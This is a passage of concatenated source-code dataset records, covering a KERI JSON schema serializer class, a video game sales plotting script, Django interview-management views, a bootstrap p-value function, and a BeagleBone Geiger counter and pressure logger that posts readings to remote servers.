ex:\n logger.error(f'json.decoder.JSONDecodeError {ex}')\n return False\n except Exception:\n return False\n\n return True\n\n\nclass Schemer:\n \"\"\"\n Schemer is KERI schema serializer-deserializer class\n Verifies self-addressing identifier base on schema type\n Only supports current version VERSION\n\n Has the following public properties:\n\n Properties:\n .raw is bytes of serialized event only\n .sed is JSON schema dict\n .kind is Schema kind string value (see namedtuple coring.Serials)\n .saider is Saider instance of self-addressing identifier\n .said is qb64 digest from .saider\n\n Hidden Attributes:\n ._raw is bytes of serialized schema only\n ._sed is JSON schema dict\n ._kind is schema kind string value (see namedtuple coring.Serials)\n supported kinds are 'JSONSchema'\n ._code is default code for .saider\n ._saider is Saider instance of digest of .raw\n\n\n \"\"\"\n\n def __init__(self, raw=b'', sed=None, kind=None, typ=JSONSchema(), code=MtrDex.Blake3_256):\n \"\"\"\n Deserialize if raw provided\n Serialize if sed provided but not raw\n When serilaizing if kind provided then use kind instead of field in sed\n\n Parameters:\n raw is bytes of serialized schema\n sed is JSON dict or None\n if None its deserialized from raw\n schemaType is the type of schema\n kind is serialization kind string value or None (see namedtuple coring.Serials)\n supported kinds are 'json', 'cbor', 'msgpack', 'binary'\n if kind is None then its extracted from ked or raw\n code is .saider default digest code\n\n \"\"\"\n\n self._code = code\n if raw:\n self.raw = raw\n elif sed:\n self.typ = typ\n self._kind = kind\n self.sed = sed\n else:\n raise ValueError(\"Improper initialization need raw or sed.\")\n\n if not self._verify_schema():\n raise ValidationError(\"invalid kind {} for schema {}\"\n \"\".format(self.kind, self.sed))\n\n def _inhale(self, raw):\n \"\"\"\n Loads type specific Schema ked and verifies the self-addressing identifier\n of the raw content\n\n Parameters:\n raw: JSON to load\n\n \"\"\"\n self.typ = self._sniff(raw)\n sed, kind, saider = self.typ.load(raw=raw)\n\n return sed, kind, saider\n\n def _exhale(self, sed, kind=None):\n \"\"\"\n Dumps type specific Schema JSON and returns the raw bytes, sed\n and schema kind\n\n Parameters:\n sed: JSON to load\n kind (Schema) tuple of schema type\n\n \"\"\"\n saider = Saider(sad=sed, code=self._code, label=self.typ.id_)\n sed[self.typ.id_] = saider.qb64\n raw = self.typ.dump(sed)\n\n return raw, sed, kind, saider\n\n @staticmethod\n def _sniff(raw):\n try:\n raw.index(b'\"$schema\"')\n except ValueError:\n pass\n else:\n return JSONSchema()\n\n # Default for now is JSONSchema because we don't support any other\n return JSONSchema()\n\n @property\n def raw(self):\n \"\"\" raw property getter \"\"\"\n return self._raw\n\n @raw.setter\n def raw(self, raw):\n \"\"\" raw property setter \"\"\"\n sed, kind, saider = self._inhale(raw=raw)\n self._raw = bytes(raw) # crypto ops require bytes not bytearray\n self._sed = sed\n self._kind = kind\n self._saider = saider\n\n @property\n def sed(self):\n \"\"\" ked property getter\"\"\"\n return self._sed\n\n @sed.setter\n def sed(self, sed):\n \"\"\" ked property setter assumes ._kind \"\"\"\n raw, sed, kind, saider = self._exhale(sed=sed, kind=self._kind)\n self._raw = raw\n self._kind = kind\n self._sed = sed\n self._saider = saider\n\n @property\n def kind(self):\n \"\"\" kind property getter \"\"\"\n return self._kind\n\n @kind.setter\n def kind(self, kind):\n \"\"\" kind property setter Assumes ._ked \"\"\"\n raw, kind, sed, saider = self._exhale(sed=self._sed, kind=kind)\n self._raw = raw\n self._sed = sed\n self._kind = kind\n self._saider = Saider(raw=self._raw, code=self._code, label=Ids.dollar)\n\n @property\n def saider(self):\n \"\"\" saider property getter \"\"\"\n return self._saider\n\n @property\n def said(self):\n \"\"\" said property getter, relies on saider \"\"\"\n return self.saider.qb64\n\n def verify(self, raw=b''):\n \"\"\"\n Returns True if derivation from ked for .code matches .qb64 and\n If prefixed also verifies ked[\"i\"] matches .qb64\n False otherwise\n\n Parameters:\n raw (bytes): is serialised JSON content to verify against schema\n \"\"\"\n\n return self.typ.verify_json(schema=self.sed, raw=raw)\n\n def _verify_schema(self):\n \"\"\"\n Returns True if derivation from ked for .code matches .qb64 and\n If prefixed also verifies ked[\"i\"] matches .qb64\n False otherwise\n\n \"\"\"\n\n return self.typ.verify_schema(schema=self.sed)\n", "sub_path": "src/keri/core/scheming.py", "file_name": "scheming.py", "file_ext": "py", "file_size_in_byte": 23519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "jsonschema.RefResolver", "line_number": 77, "usage_type": "call"}, {"api_name": "coring.Ids.dollar", "line_number": 204, "usage_type": "attribute"}, {"api_name": "coring.Ids", "line_number": 204, "usage_type": "name"}, {"api_name": "coring.Serials.json", "line_number": 212, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 212, "usage_type": "name"}, {"api_name": "coring.Serials.json", "line_number": 213, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 213, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 215, "usage_type": "call"}, {"api_name": "kering.DeserializationError", "line_number": 217, "usage_type": "call"}, {"api_name": "coring.Serials.mgpk", "line_number": 220, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 220, "usage_type": "name"}, {"api_name": "msgpack.loads", "line_number": 222, "usage_type": "call"}, {"api_name": "kering.DeserializationError", "line_number": 224, "usage_type": "call"}, {"api_name": "coring.Serials.cbor", "line_number": 227, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 227, "usage_type": "name"}, {"api_name": "cbor2.loads", "line_number": 229, "usage_type": "call"}, {"api_name": "kering.DeserializationError", "line_number": 231, "usage_type": "call"}, {"api_name": "coring.Saider", "line_number": 237, "usage_type": "call"}, {"api_name": "kering.ValidationError", "line_number": 240, "usage_type": "call"}, {"api_name": "kering.ValidationError", "line_number": 243, "usage_type": "call"}, {"api_name": "coring.Serials.json", "line_number": 249, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 249, "usage_type": "name"}, {"api_name": "coring.dumps", "line_number": 250, "usage_type": "call"}, {"api_name": "jsonschema.Draft7Validator.check_schema", "line_number": 277, "usage_type": "call"}, {"api_name": "jsonschema.Draft7Validator", "line_number": 277, "usage_type": "attribute"}, {"api_name": "jsonschema.exceptions", "line_number": 278, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 295, "usage_type": "call"}, {"api_name": "jsonschema.validate", "line_number": 296, "usage_type": "call"}, {"api_name": "jsonschema.exceptions", "line_number": 297, "usage_type": "attribute"}, {"api_name": "jsonschema.exceptions", "line_number": 300, "usage_type": "attribute"}, {"api_name": "json.decoder", "line_number": 303, "usage_type": "attribute"}, {"api_name": "coring.MtrDex.Blake3_256", "line_number": 338, "usage_type": "attribute"}, {"api_name": "coring.MtrDex", "line_number": 338, "usage_type": "name"}, {"api_name": "kering.ValidationError", "line_number": 367, "usage_type": "call"}, {"api_name": "coring.Saider", "line_number": 394, "usage_type": "call"}, {"api_name": "coring.Saider", "line_number": 452, "usage_type": "call"}, {"api_name": "coring.Ids.dollar", "line_number": 452, "usage_type": "attribute"}, {"api_name": "coring.Ids", "line_number": 452, "usage_type": "name"}]} +{"seq_id": "153938511", "text": "import re\nimport plotly\nimport plotly.graph_objs as go\nfrom plotly import tools\nfrom collections import Counter\n\nnan = float('nan')\n\ninput_file = '../filereader/vgsales.csv'\n\n\ndef getYear(line):\n result = re.split(r',', line, maxsplit=1)\n Year = re.findall(r'[1-3][0-9]{3}', result[0])\n return Year[0], result[1]\n\n\ndef getPlatform(line):\n result = re.split(r',', line, maxsplit=1)\n Platform = result[0].strip()\n return Platform, result[1]\n\n\ndef getName(line):\n result = re.split(r',', line, maxsplit=1)\n return result[0], result[1]\n\n\ndef getRank(line):\n result = re.split(r',', line, maxsplit=1)\n return result[0], result[1]\n\n\ncurrent_line = 0\ni = 0\ntry:\n\n with open(input_file, encoding=\"utf8\", mode='r') as file:\n file.readline()\n line_number = 1\n dataset = {}\n for line in file:\n i += 1\n\n columns = line.split(',')\n\n Rank, line = getRank(line)\n Name, line = getName(line)\n Platform, line = getPlatform(line)\n try:\n Year, line = getYear(line)\n except IndexError:\n Year = 'Unknown'\n if Year not in list(dataset.keys()):\n dataset[Year] = {}\n\n if Platform not in list(dataset[Year].keys()):\n dataset[Year][Platform] = dict()\n\n if Name not in dataset[Year][Platform]:\n dataset[Year][Platform][Name] = Rank\n # print(dataset)\n print(dataset)\nexcept IOError:\n print('Error with file', IOError.errno, IOError.strerror)\nexcept ValueError:\n print('Error in line', current_line, ValueError)\n\ninput_file = '../filereader/vgsales.csv'\nwith open(input_file, encoding=\"utf8\", mode='r') as file:\n file.readline()\n\n count_of_game = dict()\n\n for line in file:\n columns = line.split(',')\n Name = columns[1]\n Year = columns[3]\n\n if Year not in count_of_game:\n count_of_game[Year] = list()\n if Name not in count_of_game[Year]:\n count_of_game[Year].append(Name)\n #print(count_of_game)\n\nv = -1\ncount = []\nwhile v != 541:\n v += 1\n count.append(len((count_of_game[Year])[v]))\n\n#print(list(count_of_game.keys()))\n#print(count)\nscat = go.Scatter(x=list(count_of_game.keys()),\n y=count,\n name='Year - count of game')\n\nwith open(input_file, encoding=\"utf8\", mode='r') as file:\n file.readline()\n\n platforms = list()\n\n for line in file:\n columns = line.split(',')\n Platform = columns[2]\n\n platforms.append(Platform)\n #print(platforms)\n\nplatforms1 = Counter(platforms)\n#print(platforms1)\n\npie = go.Pie(labels=list(platforms1.keys()),\n values=list(platforms1.values()))\n\nwith open(input_file, encoding=\"utf8\", mode='r') as file:\n file.readline()\n\n rank = dict()\n\n for line in file:\n columns = line.split(',')\n\n Rank = columns[0]\n Platform = columns[2]\n\n if Platform not in rank:\n rank[Platform] = set()\n\n rank[Platform].add(float(Rank))\n #print(rank)\n\nmax_rank = list()\nfor Platform in rank:\n maximum = max(rank[Platform])\n max_rank.append(maximum)\n#print(max_rank)\n\nbar = go.Bar(x=list(rank.keys()),\n y=max_rank)\n\n'''fig = tools.make_subplots(rows=2, cols=2)\n\nfig.append_trace(bar, 1, 1)\n\n#fig.append_trace(pie, 2, 1)\n\nfig.append_trace(scat, 2, 2)'''\n\nfig={\n 'data':[\n {\n \"values\": list(platforms1.values()),\n \"labels\": list(platforms1.keys()),\n\n \"domain\": {\"x\": [0, .45],\n \"y\":[0.55, 1]},\n\n \"type\": \"pie\"\n },\n\n {\"x\":list(rank.keys()),\n \"y\":max_rank,\n \"xaxis\": \"x2\",\n \"yaxis\": \"y2\",\n \"type\":\"bar\"\n },\n\n {\"x\":list(count_of_game.keys()),\n \"y\":count,\n \"type\": \"scatter\"}\n],\n\"layout\" : go.Layout(\n xaxis=dict(domain=[0, 0.45]), yaxis=dict(domain=[0, 0.45]),\n xaxis2=dict(domain=[0.55, 1]), yaxis2=dict(domain=[0, 0.45], anchor='x2'))}\nplotly.offline.plot(fig, filename=\"myplotly.html\")\n\n\n", "sub_path": "workshop6(1).py", "file_name": "workshop6(1).py", "file_ext": "py", "file_size_in_byte": 4052, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.split", "line_number": 13, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 14, "usage_type": "call"}, {"api_name": "re.split", "line_number": 19, "usage_type": "call"}, {"api_name": "re.split", "line_number": 25, "usage_type": "call"}, {"api_name": "re.split", "line_number": 30, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 94, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 94, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 110, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Pie", "line_number": 113, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 113, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 139, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 139, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 173, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 173, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 176, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 176, "usage_type": "attribute"}]} +{"seq_id": "169267013", "text": "from django.shortcuts import render\nfrom django.views import View\nfrom .models import *\nfrom .forms import *\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect,JsonResponse,HttpResponse\nfrom django.template.loader import render_to_string\nfrom django.template import RequestContext, context\nimport json\n# Create your views here.\n\n\nclass InterviewView(View):\n\n def post(self,request):\n message=[]\n my_form=InterviewForm(request.POST or None)\n if my_form.is_valid():\n title=my_form.cleaned_data['title']\n date=my_form.cleaned_data['date']\n if title==\"\":\n message.append('Title name shouldn\\'t be empty')\n elif date==\"\":\n message.append('Date name shouldn\\'t be empty')\n else:\n my_form.save()\n message.append('Interview added sucessfully')\n msg = render_to_string('messages.html', {'messages':message})\n all_list=InterviewModel.objects.all().order_by('-id')\n interviewlist=render_to_string('interview/interviewlistTbody.html', {'all_list':all_list})\n context={'msg':msg,'interviewlist':interviewlist}\n context=json.dumps(context)\n return HttpResponse(context,content_type='application/json')\n \n\n\ndef interviewlist(request):\n all_list=InterviewModel.objects.all().order_by('-id')\n return render(request, 'interview/interviewlist.html',{'all_list':all_list,'form':InterviewForm})\n\nclass interviewEdit(View):\n def get(self,request,pk):\n inter_view=InterviewModel.objects.get(pk=pk)\n my_form=InterviewForm(instance=inter_view)\n data=render_to_string('interview/interviewedit.html',{'form':my_form,'id':inter_view.id},request=request)\n #data={'id':inter_view.id,'title':inter_view.title,'date':inter_view.date}\n #return JsonResponse(data)\n return HttpResponse(data)\n \n def post(self,request,pk):\n message=[]\n inter_view=InterviewModel.objects.get(pk=pk)\n my_form=InterviewForm(request.POST,request.FILES,instance=inter_view)\n if my_form.is_valid():\n title=my_form.cleaned_data['title']\n date=my_form.cleaned_data['date']\n if title==\"\":\n messages.info(request, 'Title name shouldn\\'t be empty')\n elif date==\"\":\n messages.info(request, 'Date name shouldn\\'t be empty')\n else:\n my_form.save()\n message.append('Interview edited sucessfully')\n msg = render_to_string('messages.html', {'messages':message})\n row=render_to_string('interview/tablerow.html',{'list':inter_view},request=request)\n context={'msg':msg,'row':row}\n context=json.dumps(context)\n return HttpResponse(context,content_type='application/json')\n\ndef deleteInterview(request,pk):\n instance = InterviewModel.objects.get(pk=pk)\n instance.delete()\n messages.info(request, 'Sucessfully deleted')\n return HttpResponseRedirect('/')\n\n\ndef sessionlist(request):\n all_list=Session.objects.all()\n return render(request, 'sessionlist.html',{'all_list':all_list})\n\n\nclass AddSessionView(View):\n def get(self,request):\n return render(request, 'addsession.html',{'form':SessionForm})\n\n def post(self,request):\n my_form=SessionForm(request.POST)\n if my_form.is_valid():\n title=my_form.cleaned_data['title']\n date=my_form.cleaned_data['date']\n applicant=my_form.cleaned_data['aplicant']\n if title==\"\":\n messages.info(request, 'Title name shouldn\\'t be empty')\n elif date==\"\":\n messages.info(request, 'Date name shouldn\\'t be empty')\n else:\n my_form.save()\n return HttpResponseRedirect('/sessionlist')\n \n\nclass sessionEdit(View):\n def get(self,request,pk):\n inter_view=Session.objects.get(pk=pk)\n my_form=SessionForm(instance=inter_view)\n return render(request, 'sessionedit.html',{'form':my_form})\n \n def post(self,request,pk):\n inter_view=Session.objects.get(pk=pk)\n my_form=SessionForm(request.POST,request.FILES,instance=inter_view)\n if my_form.is_valid():\n title=my_form.cleaned_data['title']\n date=my_form.cleaned_data['date']\n messages.info(request, 'Title name shouldn\\'t be empty')\n if title==\"\":\n messages.info(request, 'Title name shouldn\\'t be empty')\n elif date==\"\":\n messages.info(request, 'Date name shouldn\\'t be empty')\n else:\n my_form.save()\n return HttpResponseRedirect('/sessionlist')\n\ndef deletesession(request,pk):\n instance = Session.objects.get(pk=pk)\n instance.delete()\n messages.info(request, 'Sucessfully deleted')\n return HttpResponseRedirect('/sessionlist')", "sub_path": "interview/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5034, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.views.View", "line_number": 13, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 28, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 30, "usage_type": "call"}, {"api_name": "django.template.context", "line_number": 31, "usage_type": "name"}, {"api_name": "django.template.context", "line_number": 32, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.template.context", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 39, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 41, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 58, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 58, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 60, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 64, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 65, "usage_type": "call"}, {"api_name": "django.template.context", "line_number": 66, "usage_type": "name"}, {"api_name": "django.template.context", "line_number": 67, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 67, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 68, "usage_type": "call"}, {"api_name": "django.template.context", "line_number": 68, "usage_type": "argument"}, {"api_name": "django.contrib.messages.info", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 73, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 74, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 79, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 84, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 93, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 93, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 95, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 95, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 98, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 101, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 105, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 113, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 115, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 115, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 117, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 125, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 125, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "348819686", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 26 17:04:38 2020\n\n@author: shamu\n\"\"\"\ndef Pvalue(Vari,Sampling_n,Compo_n):\n from scipy.stats import norminvgauss\n import numpy as np\n from tqdm import tqdm\n # import random\n # random.seed('')\n t,idx,idy = Vari.shape\n R_Vari = np.zeros([Sampling_n,idx,idy]) \n\n x_Mean = np.zeros([idx,idy])\n x_Var = np.zeros_like(x_Mean)\n x_Norminv = np.zeros([2,idx,idy])\n print('Processing...(1/2)')\n for i in tqdm(range(Sampling_n)):\n for j in range(idx):\n for k in range(idy):\n R_num = np.random.randint(low=0,high=t,size=Compo_n)\n R_Vari[i,j,k] = np.squeeze( np.nanmean(Vari[R_num,j,k]) )\n print('Processing...(2/2)')\n for i in range(idx):\n for j in range(idy):\n x_Mean[i,j] = np.nanmean(np.squeeze(R_Vari[:,i,j]))\n x_Var[i,j] = np.sqrt(np.squeeze(R_Vari[:,i,j]).var())\n x_Norminv[:,i,j] = norminvgauss.ppf([.5,.95],x_Mean[i,j],x_Var[i,j])\n return x_Mean, x_Var, x_Norminv\n ", "sub_path": "Ori/psi_package/pvalue.py", "file_name": "pvalue.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.stats.norminvgauss.ppf", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.stats.norminvgauss", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "76581725", "text": "#!/usr/bin/env python3\n\nimport gimpbbio.gpio as gpio\nimport serial\nimport re\nimport http.client\nimport urllib\nimport threading\nimport queue\nimport sys\nimport datetime\nimport time\nimport socket\nimport logging\nimport logging.handlers\nimport argparse\nimport json\nimport Adafruit_BMP.BMP085 as BMP085\n\nclass MyLogger(object):\n\tdef __init__(self, logger, level):\n\t\t\"\"\"Needs a logger and a logger level.\"\"\"\n\t\tself.logger = logger\n\t\tself.level = level\n \n\tdef write(self, message):\n\t\t# Only log if there is a message (not just a new line)\n\t\tif message.rstrip() != \"\":\n\t\t\tself.logger.log(self.level, message.rstrip())\n\nparser = argparse.ArgumentParser(description=\"geiger-counter\")\nparser.add_argument(\"-l\", \"--log\", help=\"file to write log to\")\nparser.add_argument(\"key\", help=\"Phant private key\")\n\nargs = parser.parse_args()\nif args.log:\n\tLOG_LEVEL = logging.INFO # Could be e.g. \"DEBUG\" or \"WARNING\"\n\tLOG_FILENAME = args.log\n \n\tlogger = logging.getLogger(__name__)\n\tlogger.setLevel(LOG_LEVEL)\n\thandler = logging.handlers.TimedRotatingFileHandler(LOG_FILENAME, when=\"midnight\", backupCount=14)\n\tformatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')\n\thandler.setFormatter(formatter)\n\tlogger.addHandler(handler)\n\t\n\tsys.stdout = MyLogger(logger, logging.INFO)\n\tsys.stderr = MyLogger(logger, logging.ERROR)\n\nprint(\"Starting up\")\n\naltitude_in_meters = 112\nphant_url = 'gimp-phant.azurewebsites.net'\nphant_public_key = 'kgkWV69Nqnupn6W9Xbo6'\npressure_samples = []\n\npressure_sampling_lock = threading.Lock()\nqueue = queue.Queue()\n\nuart = gpio.uarts.uart1\nuart.open()\n\n# We have a quarter-second timeout because if we start reading in\n# the middle of a serial message or if a byte is dropped for any\n# reason, we'll throw away the partial message and try again\nser = serial.Serial(port = \"/dev/ttyO1\", baudrate=9600, timeout=0.25) \n\npressure_sensor = BMP085.BMP085(mode=BMP085.BMP085_ULTRAHIGHRES)\n\nheaders = {\n\t\"Phant-Private-Key\": str(args.key),\n\t'Content-Type': 'application/x-www-form-urlencoded'\n}\n\nlogstash_url = 'logstash.saintgimp.org'\nlogstash_headers = {\n \"SaintGimp-Private-Key\": 'banana55',\n 'Content-Type': 'application/json'\n}\n\ndef sendData():\n\twhile True:\n\t\tbody = queue.get()\n\n\t\tsuccess = False\n\t\twhile not success:\n\t\t\ttry:\n\t\t\t\tgeigerData = [(k, v) for k, v in urllib.parse.parse_qsl(body) if k == \"cpm\" or k == \"device_time\"]\n\t\t\t\tgeigerBody = json.dumps(dict(geigerData))\n\t\t\t\tlogstashServer = http.client.HTTPConnection(logstash_url, timeout=10)\n\t\t\t\tlogstashServer.request(method=\"POST\", url=\"/geiger\", body=geigerBody, headers=logstash_headers)\n\t\t\t\tresponse = logstashServer.getresponse()\n\t\t\t\tresponse.read()\n\n\t\t\t\tif response.status == 200:\n\t\t\t\t\tsuccess = True\n\t\t\t\t\tprint(\"Logged to logstash server: \" + geigerBody)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Logstash server returned status \" + str(response.status) + \": \" + response.reason)\n\n\t\t\t\tpressureData = [(k, v) for k, v in urllib.parse.parse_qsl(body) if k == \"pressure\" or k == \"sea_level_pressure\" or k == \"device_time\"]\n\t\t\t\tpressureBody = json.dumps(dict(pressureData))\n\t\t\t\tlogstashServer = http.client.HTTPConnection(logstash_url, timeout=10)\n\t\t\t\tlogstashServer.request(method=\"POST\", url=\"/pressure\", body=pressureBody, headers=logstash_headers)\n\t\t\t\tresponse = logstashServer.getresponse()\n\t\t\t\tresponse.read()\n\n\t\t\t\tif response.status == 200:\n\t\t\t\t\tprint(\"Logged to logstash server: \" + geigerBody)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Logstash server returned status \" + str(response.status) + \": \" + response.reason)\n\n\t\t\texcept (http.client.HTTPException, socket.error) as err:\n\t\t\t\tprint(\"HTTP error: {0}\".format(err))\n\n\t\t\tif not success:\n\t\t\t\ttime.sleep(5)\n\t\t\t\tprint(\"Retrying...\")\n\ndef oncePerMinute():\n\tglobal next_interval_time\n\twhile True:\n\t\ttry:\n\t\t\t# Sleep for the remainder of the time until the next\n\t\t\t# interval, prevents timer drift. The calculated time\n\t\t\t# to sleep could be negative if our clock got updated\n\t\t\t# by ntptime so just sleep one minute in that case.\n\t\t\tnext_interval_time += 60\n\t\t\tsleep_time = next_interval_time - time.time()\n\t\t\tif sleep_time < 0:\n\t\t\t\tsleep_time = 60\n\t\t\ttime.sleep(sleep_time)\n\n\t\t\tdevice_time = str(datetime.datetime.now())\n\t\t\tcurrent_cpm = cpm\n\n\t\t\tpressure = getPressure()\n\t\t\tsea_level_pressure = pressure / pow(1.0 - altitude_in_meters / 44330.0, 5.255)\n\n\t\t\tbody = urllib.parse.urlencode({'cpm': current_cpm, 'device_time': device_time, 'pressure': '{0:0.2f}'.format(pressure), 'sea_level_pressure': '{0:0.2f}'.format(sea_level_pressure)})\n\t\t\tqueue.put_nowait(body)\n\t\texcept:\n\t\t\tprint(\"Unexpected onePerMinute error: {0}\".format(sys.exc_info()[0]))\n\t\telse:\n\t\t\tprint(\"Queued sample\")\n\ndef samplePressure():\n\tglobal pressure_samples\n\twhile True:\n\t\twith pressure_sampling_lock:\n\t\t\tpressure_samples.append(pressure_sensor.read_pressure())\n\ndef getPressure():\n\tglobal pressure_samples\n\twith pressure_sampling_lock:\n\t\tmedian_pressure = median(pressure_samples)\n\t\tpressure_samples = []\n\treturn median_pressure\n\ndef median(number_list):\n\tsorted_list = sorted(number_list)\n\tlength = len(sorted_list)\n\tif not length % 2:\n\t\treturn (sorted_list[length // 2] + sorted_list[length // 2 - 1]) / 2.0\n\telse:\n\t\treturn sorted_list[length // 2]\n\nsocket.setdefaulttimeout(10)\n\nsendThread = threading.Thread(target = sendData)\nsendThread.daemon = True\nsendThread.start()\n\nnext_interval_time = time.time()\n\nsampleThread = threading.Thread(target = oncePerMinute)\nsampleThread.daemon = True\nsampleThread.start()\n\npressureThread = threading.Thread(target = samplePressure)\npressureThread.daemon = True\npressureThread.start()\n\nwhile True:\n\tbytes = ser.read(36)\n\n\tif len(bytes) == 36:\n\t\ttry:\n\t\t\tline1 = bytes[2:18].decode('ascii')\n\t\t\tline2 = bytes[20:36].decode('ascii')\n\t\t\t#print(line1 + \" \" + line2)\n\n\t\t\tcpm = int(re.search(r'CPM:\\s*(\\d+)', line1).group(1))\n\t\texcept (UnicodeDecodeError):\n\t\t\tprint(\"Unicode decoding error!\")\n", "sub_path": "geiger-counter/remote-logging.py", "file_name": "remote-logging.py", "file_ext": "py", "file_size_in_byte": 5813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.handlers.TimedRotatingFileHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 42, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 47, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 48, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 48, "usage_type": "attribute"}, {"api_name": "threading.Lock", "line_number": 57, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 58, "usage_type": "call"}, {"api_name": "gimpbbio.gpio.uarts", "line_number": 60, "usage_type": "attribute"}, {"api_name": "gimpbbio.gpio", "line_number": 60, "usage_type": "name"}, {"api_name": "serial.Serial", "line_number": 66, "usage_type": "call"}, {"api_name": "Adafruit_BMP.BMP085.BMP085", "line_number": 68, "usage_type": "call"}, {"api_name": 